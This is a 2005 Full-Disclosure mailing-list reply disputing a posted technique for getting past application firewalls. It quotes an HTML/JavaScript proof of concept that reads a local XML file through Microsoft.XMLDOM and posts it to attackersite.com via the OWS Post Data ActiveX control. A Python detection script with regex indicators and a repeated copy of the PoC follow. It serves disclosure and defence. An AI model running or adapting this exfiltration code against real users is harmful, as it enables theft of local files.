RE: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data



-----Original Message-----
From: Gaurav Kumar
Sent: Wednesday, December 21, 2005 8:59 PM
To: full-disclosure@xxxxxxxxxxxxxxxxx
Cc: websecurity@xxxxxxxxxxxxx
Subject: [Full-disclosure] new attack technique? using
JavaScript+XML+OWSPost Data

1>> A Trojan has to be placed in a system running an
1>> application firewall like Zone Alarm Pro etc.

>> Assumptions:

2>> The target system must have Office XP and the user has
2>> to be lured to view a webpage hosted by the attacker.

3>> The Trojan can be designed to generate an xml
3>> file which will contain the data to be sent out. The attacker will lure the
3>> user to visit a website hosted by him.

Lol !! In a practical scenario, the attacker who spreads the worm/trojans
himself is not aware in the initial stage which are the infected machines
unless the trojan sends the machine/user info back to the attacker. Now,
as you have already mentioned, ZA is running, so no data can be sent back to
the attacker. So the attacker is clueless which are those infected machines.
So the case of luring the user to visit the link is out of scope...


>> The site can have following HTML code-

Now coming back to technical stuff, you are trying to access a local file,
which will only be allowed if the site is in "Trusted Sites" or "Local
Intranet" or "Local Security Zone" and the ActiveX control is not marked safe.
The fact that *the client is also the server* is irrelevant.

Try uploading the script to some webserver and give it an .html extension; it
will throw an _access denied_ error when the page loads (even on Win XP +
SP1).

In case of any server side extension like *.asp, *.jsp etc., the user will be
prompted that a malicious component is trying to load and asked for
permission.


>> <html>
>> <body>
>> The author is not responsible for any misuse,
>> this PoC is for educational purpose only.
>> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
>> id="exp">
>> </object>
>> <script LANGUAGE=javascript>
>> var xmlDoc
>> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
>> xmlDoc.async=false;
>> xmlDoc.load("c:\\note.xml");
>> xmlObj=xmlDoc.documentElement;
>> var a= xmlObj.firstChild.text;
>> exp.Post(0,"http://www.attackersite.com/input.asp",a);
>> </script>
>> </body>
>> </html>


>> The above code (works well on Windows XP SP2) essentially calls the
>> "OWS Post Data" COM control to post the contents of note.xml
>> (generated by the trojan) to attackersite.com

IMHO, never conduct such tests in an "Intranet Zone" or "Local Zone" and draw
conclusions about the "Internet Security Zone".

You may also follow this link to know more about this issue -
http://support.microsoft.com/kb/317244/EN-US/


>>> Essentially, the technique is breaking the basic
>>> functionality of application firewalls by using OWS Post Data
>>> as bridge for sending out the data using Javascript and XML.

Not Exactly !! I would rather suggest you do a little more research and then
draw any conclusion. Keep those _Security Zones_ in mind before you post
anything...


- D


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
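As an added illustration (not code from either poster in this thread), a small static check a defender could run over captured HTML or mail attachments to flag the chain discussed above: the OWS Post Data CLSID, Microsoft.XMLDOM loading a local drive path, and a Post() to an external URL. The indicator names, the heuristics and the benign sample page are constructed for this example.

```python
import re

# Heuristic indicators drawn from the PoC quoted in this thread. These are
# constructed detection patterns for illustration, not a vendor signature set.
OWS_POST_DATA_CLSID = "BDEADE98-C265-11D0-BCED-00A0C90AB50F"

PATTERNS = {
    # <object classid="clsid:{BDEADE98-...}"> instantiating OWS Post Data
    "ows_post_data_object": re.compile(
        r'classid\s*=\s*["\']?clsid:\{?' + OWS_POST_DATA_CLSID + r'\}?', re.I),
    # new ActiveXObject("Microsoft.XMLDOM")
    "xmldom_activex": re.compile(
        r'ActiveXObject\s*\(\s*["\']Microsoft\.XMLDOM["\']', re.I),
    # .load("c:\...") / .load("\\server\share") / .load("file:...") from script
    "local_file_load": re.compile(
        r'\.load\s*\(\s*["\'](?:[a-z]:\\|\\\\|file:)', re.I),
    # .Post(<n>, "http://...", ...) pushing data to an external host
    "post_to_external": re.compile(
        r'\.Post\s*\(\s*\d+\s*,\s*["\']https?://', re.I),
}


def scan_html(html: str) -> dict:
    """Run every indicator over the page source and return a verdict.
    A page is flagged only when a local file read is combined with an
    outbound channel (OWS Post Data object or .Post() to an http URL)."""
    hits = {name: bool(rx.search(html)) for name, rx in PATTERNS.items()}
    outbound = hits["ows_post_data_object"] or hits["post_to_external"]
    return {"hits": hits, "suspicious": hits["local_file_load"] and outbound}


# Constructed samples: the PoC from the thread, and a benign page that loads
# a relative XML file from its own site (no local path, no outbound post).
POC_PAGE = r'''<html><body>
<object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" id="exp"></object>
<script LANGUAGE=javascript>
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.async = false;
xmlDoc.load("c:\\note.xml");
var a = xmlDoc.documentElement.firstChild.text;
exp.Post(0, "http://www.attackersite.com/input.asp", a);
</script></body></html>'''

BENIGN_PAGE = r'''<script>
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.load("data/catalog.xml");
</script>'''
```

Running `scan_html(POC_PAGE)` reports the page as suspicious with all four indicators set, while the benign page only trips the XMLDOM indicator and is not flagged.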


